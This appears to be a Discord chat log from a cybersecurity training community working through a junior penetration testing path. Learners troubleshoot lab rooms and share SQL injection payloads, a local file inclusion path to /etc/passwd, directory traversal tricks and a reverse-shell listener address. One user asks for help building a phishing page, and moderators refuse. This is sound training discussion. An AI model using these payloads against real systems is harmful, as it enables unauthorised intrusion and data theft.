so i don't have to open the ticket by myself after creating it???

No, like I said, if you open the ticket on your own you will only get your own session cookie.

ok l will try that thanks for the explanation 👍🏻

Thanks very much I solved.

Gave +1 Rep to @shadow echo

Finally I have completed this path. I feel I have learned a lot. Also I got 22 days fo streak . Thank You for this @tiny bluff

Wow good work man

Keep up the good work and you will be an elite hacker in no time

When you phish a link for example an Instagram phishing link,is it possible for the phishing link to exactly like Instagram’s phishing page with logo and everything?

*to look

You don't phish a link, you phish a person.
And yes?

Instagram doesn't have its own phishing page, because of the definition of phishing

I mean how can you have a look like page as Instagram,is that possible?

The page that you see is what the browser renders.
The HTML and CSS is what tells the browser what to render.
Same HTML and CSS means same render.

Not browser 🤦🏻

Chill

Pages are rendered in a browser. That's how you look at sites.

That's an email

Just like this PlayStation email sent to me,I mean can I have the same copy of that to add to my phishing page

HTML emails are common now

Are you trying to make a phishing page?

Yes

Stop.

lol

We do not tolerate that here.

It's entirely blackhat.

😅

It's also unrelated to the junior pentesting path

Just asked a question...Some people learn black hat just to be knowledgeable about it🤓

Yeah, and we don't tolerate that here.
Discord closes down blackhat servers.
We're not allowed to tolerate illegal activities.
Please stop. Please don't argue.

I wasn’t arguing just saying

That was arguing. And you're now arguing about that.

Ok

so do you want hack your ex's/crush's insta account using phishing page 😂 😂 😂 😂 Literally we get these dms daily😂

Yes I really want to😂and her friends

I would be careful about saying that around here. You can and will get banned for it

For what it's worth, it was dealt with.
Please don't try to start more trouble here, it's really irritating.

Hi

Hi there, is anyone facing problem on authentication bypass room? Specifically on Task 3? That ffuf command isn't working. Any thoughts on that?

From searching, I saw an issue on GitHub that multiple word-list feature isn't working. If I had a problem with word-list, I think I would face a problem on task 2.

Let me check it again.

oh, I am checking it again. Thanks for the suggestion!

Gave +1 Rep to @steel nymph

You are right. It was my mistake. Umm, can you give me another suggestion? If I were to save a huge output without any junks, what should I do in that case?

Thanks a lot, lassi! Kinda funny 😑 , I am afraid of awk/sed command, guess need to learn it very well.

I can see read,write,execute and what’s the meaning of the “d”...and how is “rwx “assigned to each file...I’m confused with the way it’s assigned to each file and directory...meaning you read and write some files while you can’t in some ?

im doing that and i dont understand the permissions

🦖

what dont you understand about it? Saying you just dont undertsand the permissions is the same as someone saying "I dont understand windows"

Doesn’t correlate bruh

I now understand

I meant the way it was together

Lol it does. Same concept. theres a wide array of things to not understand

I think I have no probs with that anymore

👍

Yeah, just stop being a black hat! We are all meant to be white hats, working for the good of the world!

Ok🙇🏻

You wouldn't be threatening someone now, would you? More so, that wouldn't be threats of gender-based attacks, would it?

omfgyhgtbkm

Well, I learned a very valuable lesson today; probably only cost me an hour and a half of banging my head against the wrong brick wall

Those are the best lessons I find. They tend to stick around.

Wasn't pentester title permanent 🥲

Nope

Hi, I completed "Authentication Bypass" room but still confused about the whole process. Can anyone suggest good write-ups or more resources to learn and understand it better?

Also, for me, the way this room explained everything, it was kind of hard to understand, specially on Task 4. I think that by reorganizing the sentences of this room and adding a little bit extra content will make it more understandable.

Why, what was the part in task 4 you had a hard time with understanding?

For example, on PHP variable section, from where I got this variable and why I am using this and how the whole mechanism works.. it was bit tough to understand.

Umm, yeah, I admit that one may/should use search engine to get the whole picture, but comparing to other rooms where explanation/representation of contents are very good, this room is different, in my opinion.

can you suggest any resource/writeups/posts on authentication bypass?

Well tbh I don't know if there is any writeup or whatsoever that would explain it better as I never looked for such. But to fully explain everything in that room, would mean they would have to add like how arrays work, what exactly the $_REQUEST variable is, how GET and POST requests send parameters etc. which in my opinion would be beyond that rooms topic. But I can only suggest you to look up for these mentioned topics, as I think it then should become more clear. 🙂

@shadow echo I got your point. I have another curiosity, without knowing the underlying mechanism, can anyone exploit/think how to work on this? I want to know how the mind of a pentester works and where I am lacking as a total noob.

I mean I'm also still a noob compared to many others, so I don't want to give you a suggestion to something I might not qualified to 😄 But if we talk about that specific example, I think knowing the underlying mechanisms would be always good. But to know that this application is vulnerable to such an attack you might anyways would have to see the source code of that application, so if you get to see the source code of it, it definitely helps you, but I think most of the time you are not able to to see that, so you anyways would have to manually test on it and therefore you would be still able to exploit it without exactly knowing the mechanism. But as I said, I'm also still a noob, so just take that as my opinion rather then a right answer 😄

@steady hollow this might be helpful: Black Hat Python, 2nd Edition

Thanks! I have a pdf copy, I will read it.

Gave +1 Rep to @bleak pilot

I got the point. Thanks!

If you are totally new to programming you may want to start here with the basics: Python Programming for Beginners: The Ultimate Guide for Beginners to Learn Python Programming: Crash Course on Python Programming for Beginners

I am familiar with python and java programming at basic level. I followed the Crash course on Python programming and it was a great book to read.

Good deal. Just didn't want you to feel like you just got thrown into the deep end of the pool.

Can I DM you?

Hey, it was a great suggestion. Any suggestions will be appreciated. ❤️

Of course.

Is anyone else struggling with Windows Defender on the DLL Hijack portion of the Windows Privesc room?

Struggeling with Windows Defender? In what way?

It was blocking my download, but i recompiled and it accepted it this time.

on "Walking An Application" module, task3 and task6, there are two questions were I entered the flags I found, but it told me they were wrong. I think is a bug but I haven't seen anyone complaning. On task3, the framework flag, I entered the credentials I found to login and pop a page with a flag. I am assuming that is the flag for the framework, but it tells me is wrong. On task6, same thing happened for the contact-msg network flag. Am I missing something?

Are you submitting the flag in the right format?

are you sure there is no errors when pasting?

I am copying and paste, so I am not sure what you mean on the right format -> THM{}

The entire room uses the same website. You can find a bunch if the flags before you actually need th

There's a good chance the flag you found will be used later

But it's not the right one for the task your up to

Read the hint, the flag you are looking for is inside a downloadable file

ok, that makes sense. I just counted how many * are inside the asterik for the contac-msg, and does not match the one on the flag I found. I guess I will have to keep looking on that one.

for that one I looked at the header.

found it!, one down another to go.

Got both missing flag, the other flags I found weren't part of this section which means I'll probably seen them on another module.

Yup

ok.

I give up.

LFI challenge 2

||I set my cookie to Admin||

But for some reason the request wont go through.

Like it does but it says it cant find the file

anyone else had issues

?

thanks @steel nymph lol.

Gave +1 Rep to @steel nymph

Hey guys I'm current doing the final challenge in Cross-site Scripting in Introduction to Web hacking. I'm pretty sure my payload is correct but I feel like I'm waiting forever to get the cookie

Can someone dm to make sure I have the right payload?

I'm in!
A lot of helpful answers i found here even without asking, just exercising my searching skills, entering in:junior-pentester-path in the Search field 🙏🏻
Awesomesauce path!

Damn it ! always in trouble with python exploits... Can't get a single one to work without errors. Libraries errors whereas they're installed on my OS.

The Windows Privesc section isn't loading for me, anyone experiencing the same?

Alright.

Time to try again

LFI - Lab1 (Task 4) - I am entering ||/lab1.php?file=/etc/passwd|| and I can see the passwd file, but I am getting the answer wrong. Any ideas? TIA.

What are you entering as answer?

I’m entering the thing that i covered up.

Mh, that should normally work. Have you tried CTRL + F5 (hard refresh) of the page ?

I just tried on my phone and it worked. I’ve been trying for 2 days on my laptop. Weird. Thanks for your suggestion though. I’ll try that next time i get stuck.

Gave +1 Rep to @shadow echo

Well I would have gotten another idea too, are you having bitdefender on your laptop?

Yes. Is that a problem? It didn’t stop me answering any of the other questions.

Yes, that's the issue for that answer then, it detect's the /etc/passwd part of your answer as malicious.

@steel nymph so Im making a post request with postman for challenge 3 and im getting to my file its just telling me it doesnt exist.

||Im making a post request with my actual request within the body and it sends it over correctly without filter||

but it says it cant find it.

Getting annoyed.

You might not doing the correct amount of directory traversal

tried 3, 4, and 5 directories.

am I an idiot?

What's the error/warning you get, can you post a screenshot?

yea

spoilers people.

heads up.

ive tried with and without nullbyte

tried multiple directory lengths.

and I know its something like glaringly obvious

Well it says failed to open flag3%00 instead of failed to open flag3, so seems like the way you send the null byte it's getting url encoded afterwards and therefore not doing what it should do

Guess Im not that familar with postman, am I somehow encoding it through my form request?

||sending it through the body as form data||

I don't know postman, so I can't give you the answer on that, like how to make postman not url encode the null byte. Also that's just my guess that this is the issue, how does your request look like in postmaster? I would do the request in the network tab of the dev tools for example.

For some reason after i resend through the dev tools the page doesnt move and acts like i did nothing.

I did.

just acts blank.

cancel that.

I managed.

thanks @shadow echo and @steel nymph ended up erasing that nullbyte for some stupid ass reason. The request I made wasnt adjusting the page due to where the request was going.

Gave +1 Rep to @shadow echo

thanks @steel nymph

sill robocop

give the rep.

+rep @steel nymph

Gave +1 Rep to @steel nymph

can someone please help me change the GET request to POST request on the developer page or burpsuit to get the flag for our first challenge on File inclusion Task 8?

yes i kinda have a good idea but when i tried to do it on burpsuite after intercepting the connection and sending it to repeater, not sure how to change the request method to Post

@steel nymph So i just got to change the request line to POST to have it changed?

i am gonnna have to check out some youtube videos, lmk if you have any suggestions

@pallid mist make sure you use your other resources. Plenty of info online about what how POST works. 😄

Where could I find exploit for CVE-2018-16763 (Vulnerability Capstone Module). I tried ExpDB, github and rapid7 where else I should search?

I find 4 RCE, mange to connect using one of them, but, couldn't get access via nc

@steel nymph also, there is an exploit on AttackBox but, I could not find that one.

then, I should try again.

The one on AttackBox should be fine. Don't forget to learn what that exploit is doing as you may need to change something and or/use something additional to it

where can I find that exploit outside of attackbox?

On github for sure, it is there

nope, i tried.

there are 5 of them on github, one ruby one bash and 3 py

none of them are same as the one on attackbox

Strange. By googling CVE number it gets me to the same py script on github as the one on attackbox

what am i missing here!

Are you on a VM?

aye

And openvpn is running directly inside that VM?

oh, nay... I am on my machine, not vm

and open vpn running on my machine

and I am using tun0 ip as my IP

Okay, so your attacking machine is not a VM, it's an installed OS?

yes

If you check the interfaces, how many tun interfaces you see? Only 1, so tun0 ?

nope

there are others

one of them are my pvt IP and another one is tun0

What, like tun1, tun2 ?

nope

So then there are no other tun interfaces except tun0 ?

192.168....

As the others are most likely eth and lo

yep

no tun1 or 3 only tun0

K, you want to try if you enter my THM IP and my given port if I receive the rev shell, just to check if it's an issue on your site or the target machine?

k

tq

10.14.17.128:4242

You let me know when you tried it, right ^^?

no luck

getting same error as previous

Could you post that image again? As I can't find it anymore

Have you tried to run it without putting http:// infront of the IP ?

nope

thank you @shadow echo

Gave +1 Rep to @shadow echo

it says url thats why I tried with http:// everytime

So it worked now?

yes, I got the access

on nc

Alright, great

do you know why should I try without http?

its says url on instruction.

Well the error said max retries on url: //IP so it looked like the http:// could be the issue

okay! got it!

thank again! @shadow echo

Not a problem

.

hey, I am new to metasploit

I didn't get why my exploit does not work, can someone explain?

Is that wordlist you specified just containing passwords? As in case it does, it's specified in the wrong option. The option you set the wordlist to is meant for a USER+PASSWORD file.

Hey guys! On Command Injection, for Jr. Penetration Tester Task 2 Q1, I know this answer but it keeps giving wrong answer?

Ahh never mind... I just removed a special character... so weird...

It should have been complete not an incomplete PHP code snippet.

guys i'm trying to find fla1 on file inclusion challenge but this thing does not work tried many times any guesses??

You are missing a content-type header

I know I need a scanner for the job

oh silly mistake 😄 thanks

Gave +1 Rep to @shadow echo

How illegal is it to try out these methods on public websites? Asking for a friend...

Hi guys, i'm in the task 8 of sqli (J-P-P) and I don't know what is wrong with the payload
||admin123' UNION SELECT SLEEP(5),2 from analytics_referrers where domain like '_%||

Anybody can give me a clue, ppppllslslsl!!

Is that SQLi Timed Based?

Task 7 Boolean based, my bad

nono, task 8, sorry

Time Based

Was looking at my notes and your syntax is incorrect.... the tricky part is the syntax after "like"... Not sure how came about those syntax in your first post. Look at the second commands from top down.

did you try the admin' UNION SELECT SLEEP(5),2;-- and what is the time you get when you press enter?

That gave me 5 secs

I think that I got the table_name = ||'analytics_referrers'|| and column_name ||domain and id|| . That's right?

Correct...on the 5 secs. Get rid of that underscore between analytics and referrers...

Look in your browsers' URL string

I know it's not solid black and looks faded....

analytics?referrer=user' --- also, get rid of your plural on the referrer...

Then add the 2nd syntax in the instructions top down..

after that, it gets interesting....

Look at task 7, 2nd syntax from bottom up...

Plug them all in, just keep messing with it... the hardest part is the finding the password that gets you that flag.

Password for admin...

Hey guys, why doesn't kali let me download burpsuite, updated JAR file but it's fine downloading on a Windows system?

No Proxy, no burpsuite and no interception proxy is on. Burp is closed.

Any scanning if a public website will get your IP blacklisted by your ISP most likely. You could also go to jail for scanning without permission

Thanks. I figured as much. Are there websites available that welcome people practicing the techniques?

Gave +1 Rep to @drifting drum

So apparently in task 8 of SQL Injection you can find a 'analytics_referrers' table name. I'm guessing I shouldn't be able to find that.

Wait. Looking up a few comments... Is this the right table name?

Look into bug bounty programs. While many of them don't allow scanning, it's the closest you'll get to legal hacking outside of a Profesional role

when I ping most websites, I tend to see their ip and once I visit the ip it directs me to the website. Ping tends to give me an incorrect ip of instagram and some websites but does gives me correct ip's of facebook and google...Why?

Tryhackme machines, your own local instance of DVWA

the best way to know for sure is to try. Can you gather some useful intel from this table ? if not, maybe you should try something else ?

guys i'm stuck on task 8 of sql injection can't get the flag

tried adding sleep() in the boolean based payload as they said but nothing happens

||admin123' UNION SELECT SLEEP(5) 1,2,3 FROM information_schema.tables WHERE table_schema = 'analytics_referrer' and table_name 'users' and coloumn_name like 'admin%';--||

i'm using this payload is it right??

WHERE table_schema='analytics_referrer' is not right. It's not supposed to put a table name in there

yeah man u r right!!

well i got the flag it was challenging

Oh okay, well then gj 🙂

tried changing numbers in password like

I only accept friend request from girls @modest arch

No, just kidding 😄

I'm on task 13 of burpsuite basics. Struggling to find the flag

Im at the right place just need a hint where to look

If I remember correctly, you have to visit a certain site (so make sure to visit every site once) in order for a script being executed that will place that "unusual" endpoint in your burps sitemap.

@shadow echo I visit every page once

Sry but I have a hard time seeing if you use a photo instead of a screenshot

This is where im at

Have you disabled javascript or is something blocking javascript? As from what I can see is that the javascript files are grey, so therefore they never got requested. Make sure there is nothing blocking js.

Also maybe turn of intercept in the proxy tab meanwhile, maybe that's causing the issue as the page itself never gets loaded.

Thankyou in going to try open browser with burpsuite

So have you tried turning off intercept and visit all pages again? As somehow it feels like that's the issue. Your proxy tab is highlighted so I guess there is intercept turned on.

https://tenor.com/view/lahiru-pathum-nayanathara-breaking-bad-walter-white-gif-16590504

Thanks so much it was the intercept on

I got the reverse shell but didn't find the flag

where should I look for it

Ok, so still on SQLi. I've found a column name ||domain|| but when I got to the next step and put in ||==admin123' UNION SELECT SLEEP(5),2 from domain where username like 'a%|| it gives me an error, ||SQLSTATE[42S02]: Base table or view not found: 1146 Table 'sqli_four.Domain' doesn't exist||. Is that not the right column name? Also, if I understand it correctly there's only two columns, one being 'id' and the other ||domain||. So where am I going to find the password?

Wrong column name

Yep. Just found the answer but I had to assume the column name and run with it. It never gave me a time delay on ||users||. I don't know what that's about.

I was hoping to do a write up on this one but since I never fully understood how to enumerate to the right column name I'll look for another room to write up.

You have the right idea. If it isn't working try refreshing

I'll give that a shot just for 💩 and giggles. I've spent hours on it trying to understand it. What's another five minutes?

Lol. You have the understand down. Now it's just error that's not in your contr

Control

That seems to happen from time to time. The more I learn the more I begin to understand THM's setup. I imagine they have their hands full and appreciate what they do more and more.

Hmm... Still isn't hitting anything on either ||=admin123' UNION SELECT SLEEP(5),3 FROM information_schema.COLUMNS WHERE
TABLE_SCHEMA ='sqli_four' and TABLE_NAME='analytics_referrers' and COLUMN_NAME
like 'id%';||

or ||=admin123' UNION SELECT SLEEP(5),2 FROM information_schema.COLUMNS WHERE
TABLE_SCHEMA ='sqli_four' and TABLE_NAME='analytics_referrers' and COLUMN_NAME
like 'domain%' and COLUMN_NAME !='id';|| with 'users' in the place of 'id' in the first one and 'domain' in the second. Oh well. I need to study SQLi better I think.

Table name is wrong

Well, technically its correct cuz it is a table

But it's not the table you need

When you do SQL injections like this, you need to make sure you find all the tsbles

hey guys, if there's a CVE number, that means there's definitely a public exploit somewhere to download?

I don't think that automatically means there has to be an exploit to download. But I guess for a THM room there might be one.

Ahh okok thank you!

Gave +1 Rep to @shadow echo

Definitely not

Has anyone solved this... I couldnt get the answer

I didn't got staff cookie form both the methods...

Hello guys, can you open the acmeit site by adding the attackbox ip?

You have to start the target machine and enter the IP of that target machine in order to get to the correct site. Entering the attackbox IP will not work.

@shadow echo Ok,thanks. How do i start the target machine?

Pressing the green "Start machine" button attached in one of the tasks. The little green icon in that image is indicating at what task the target machine is attached on. This image is just an example, so not from the room you might be actually in.

oh ok,awesome,thanks!

hello friends, in the Subdomain Enumeration room I am required to use FFUF -w /usr/share/wordlist/SecList.. etc, however, I do not have SecLists file on my kali linux

as far as i know thm uses parrot OS, what wordlist should i use in kali?

Well the wordlist shouldn't have anything to do with the OS. So if you don't have seclists installed, just install it.

oh its a program? ok thanks

No it's not a programm, it's just a compilation of a lot of wordlists for different purposes. https://github.com/danielmiessler/SecLists

i used apt install seclists, is it downloading the same one?

I guess so yes

thanks batman

Not a problem Guinea pig 😉

So I just finished the SSRF room but I want to understand why does using x/../ bypass the ip block when changing the avatar?

This might be a huge oversight on my end, but I'm on task 9 of the burp suite module and I don't see any option that matches the answer format in the right click options that will "allow you to intercept and modify the response to your request." Is there a change in the current version versus when the module was written?

So did you capture a request and then right clicked inside that request?

Yes.

One of the options has a sub dropdown that lead you to the answer.

i see.

bit of a misleading question, but i guess it makes sense.

thanks

thanks +1

Gave +1 Rep to @shadow echo

In the ssrfqi room its mentioned that work due to directory traversal.. Directory traversal simple means getting access to restricted files and directories. Here as you can see initially I am at my / directory, now I go to ( /root/go/pkg/mod/cache) > now think of like . Png file which is inside assets/something/something.png in the ssrf room pratical. Now, look just by using /.. /private I changed myself to move from /root/go/pkg/mod/cache to /private(I made a directory name private just show you) and the file inside the /private folder is displayed into base64 format in the website source page...

In the x/../ example does the x directory actually exist or does it not matter

X does not exist....we do it just do it to make our directory traversal exploit work...

I did the room a while back, but I was confused by traversing a non-existent directory

I am working on this room: https://tryhackme.com/room/nmap04
I checked all the links available in references, no idea what's title input.
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1635
Windows HTTP Protocol Stack ('HTTP.sys') Parsing Error Lets Remote Users Execute Arbitrary Code.

got it http-vuln-cve2015-1635.nse, it was ofc this title

so to find the script you can use locate *nse on the CLI hit ctrl + shift + f and now you can slowly type the cve, also you can use locate *cve2015-1635.nse and it will pwd.

hey I have a question for you guys who have been using THM for a long time. I am planning on becoming a CyberSecurity specialist. Should I just try as many tryhackme rooms as possible as soon as possible or should I first get the knowledge, pass the certs (Networking, Security, etc.) and then do THM rooms as a expierence gainer?

As many as possible as soon as possible is defo a not good approach. I would rephrase it to To nail as much as possible rooms following methodological approach . Without some fundamentals it will be very hard, so try to learn networking fundamentals, web fundamentals, linux fundamentals, scripting (as entrance to a wider coding area). Just don't rush yourself, try to understand rather than skipping as not full understanding will catch you later anyway and you may loose more time rather than trying to understand that at the beginning.
There are paths on THM Complete Beginner, Presecurity, Web Fundamentals... I probably would advise to start from those, but I haven't done them myself as I gained experience somewhere else. Perhaps someone who completed those paths can advise more if they are good to start with or better to start externally from taking some online courses targeting particularly Networking only, Web only, scripting (bash/python) only...

Just "doing rooms" is pointless. Your goal should be to build out a solid methodology for attacking all sorts of rooms. You want to make sure you learn something from every room you do.

I disagree.
Seeing as many different things as you can will make you better.

True, but just running through the rooms and not learning anything from them won't get you anywhere. It only helps to see many different things if you learn something from attacking those things.

but just running through the rooms and not learning anything from them You'd have to make a conscious effort not to learn anything from completing the rooms NGL

guys in burp suite intruder room task 11 i try to fuzz numbers but i don't get flag

although the ticket numbers which are already there respond with 400 error

why is that??

I kind of agree with this, I started out with a random CTF, I knew nothing when I went in and after Googling like a mad man to come out with 6/23 flags I learned an incredible amount.

I then took a step back and did the networking path then junior pen test on THM. The bits that werent covered directly were linked off to external resources or other rooms.

Good luck and enjoy the ride

Methodology is important, but so is experience.
If you've seen something similar 10 times before, it's going to be easier. You're going to be able to identify any issues or weird behaviour more easily.

guys can i get some answer??

Wrong url

what??

so what should it be?

http://MACHINE_IP/support/ticket/NUMBER

ohh right!!

Thanks Man

Why am I getting this error again and again, could anyone help me out, please.

idrsa.id_rsa should be only id_rsa

do I need to convert it? or just rename it to id_rsa?

just do mv idrsa.id_rsa id_rsa

it should do the trick

okay! Thank you @modest arch

Gave +1 Rep to @fervent pendant

anytime, lmk if you need some help again

sure 😄

🙂

File extensions are meaningless outside of Windows.

yes, I checked both file, both of them are same

can anyone guide me what am I missing here, please?

Try python2.

okay

no luck

$python /usr/share/john/ssh2john.py id_rsa > idrsah.txt
Traceback (most recent call last):
File "/usr/share/john/ssh2john.py", line 193, in <module>
read_private_key(filename)
File "/usr/share/john/ssh2john.py", line 103, in read_private_key
data = base64.decodestring(data)
AttributeError: module 'base64' has no attribute 'decodestring'

You sure python points to python2 on your distro?

python2 script.py

its not working

bash: python2: command not found

python2.7

bash: python2.7: command not found

You might ahve to work out where it is then. python doesn't mean python2 neccesarily.

Yes, I remembered it afterwards but forgot to correct myself

Your john/python installation could be broken aswell, no ?

as I see python2.7 is not installed on my distro

Hey, I was doing linprivesc room task 5. I couldn't download exploit file from attacking system http.server using wget as it shows "connection timed out" error. I tried changing ports (like 9001, 9003).

It has been solved after installing python2

got stuck on Linux PrivEsc/ Privilege Escalation: SUID
Could anyone give me hints on how to get user2 password? I could not find resource for 'how to extract suid?'

Did you find unusual binary with SUID bit set? Once found, refer to GTFObins to see how to get use of it. In one of the sections for LinPrivesc it was covered btw. Once found something interesting you need to use another technic for obtaining user2 password

im having an issue accessing a website, im doing the content discovery section of this path

task 2, asking me to go to the robots.txt site but its not loading

im either gettin error 405

or took too long to respond

im running the attack machine

also connected using openvpn

instructions telling me to use machine ip to go to robots.txt site but its not loading

You're using the attackbox's IP.
You need to use the IP of the target machine.

Hello! I do not really understand at SSRF room last task, the "x/../private" part. How is this working? I see this like doing "cd x/../Documents" but this will not work

ok thank you, how can i find the target machine's IP

Gave +1 Rep to @idle bison

Deploy the target machine. The IP will be shown under the 'Active Machine Information' heading.

If you do not see that heading, you have not deployed the machine